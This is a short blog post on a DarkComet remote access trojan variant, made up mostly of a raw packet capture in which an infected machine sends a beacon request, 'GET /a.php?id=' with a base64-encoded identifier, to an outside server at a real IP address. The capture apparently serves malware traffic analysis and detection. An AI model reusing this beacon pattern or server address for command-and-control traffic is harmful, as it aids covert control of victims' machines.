Darkcomet RAT – Remote Access Trojan Variant GET /a.php?id=

By | June 18, 2015

E..0.;@………@.+..*.P..`$….p……………
2013-02-03 22:49:45.139070 IP 64.235.43.131.80 > 172.16.253.130.1066: Flags [S.], seq 1557609149, ack 2358992933, win 64240, options [mss 1460], length 0
E..,[J……@.+……P.*\.:…`%`….T……..
2013-02-03 22:49:45.139138 IP 172.16.253.130.1066 > 64.235.43.131.80: Flags [.], ack 1, win 64240, length 0
E..(.<@.........@.+..*.P..`%\.:.P....... 2013-02-03 22:49:45.139315 IP 172.16.253.130.1066 > 64.235.43.131.80: Flags [P.], seq 1:73, ack 1, win 64240, length 72
E..p.=@….I….@.+..*.P..`%\.:.P…Q…GET /a.php?id=c2ViYWxpQGxpYmVyby5pdA== HTTP/1.1
Host: 64.235.43.131

2013-02-03 22:49:45.139579 IP 64.235.43.131.80 > 172.16.253.130.1066: Flags [.], ack 73, win 64240, length 0
E..([K……@.+……P.*\.:…`mP………….
2013-02-03 22:49:45.264212 IP 64.235.43.131.80 > 172.16.253.130.1066: Flags [P.], seq 1:169, ack 73, win 64240, length 168
E…[L……@.+……P.*\.:…`mP…>…HTTP/1.1 200 OK
Date: Mon, 09 Sep 2013 00:39:31 GMT
Server: Apache/2.4.4 (Win32) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 1
Content-Type: text/html

0
2013-02-03 22:49:45.342001 IP 172.16.253.130 > 224.0.0.22: igmp v3 report, 1 group record(s)
F..(.>………………”……………
2013-02-03 22:49:45.364096 IP 64.235.43.131.80 > 172.16.253.130.1066: Flags [P.], seq 1:169, ack 73, win 64240, length 168
E…[M……@.+……P.*\.:…`mP…>…HTTP/1.1 200 OK
Date: Mon, 09 Sep 2013 00:39:31 GMT
Server: Apache/2.4.4 (Win32) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 1
Content-Type: text/html

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *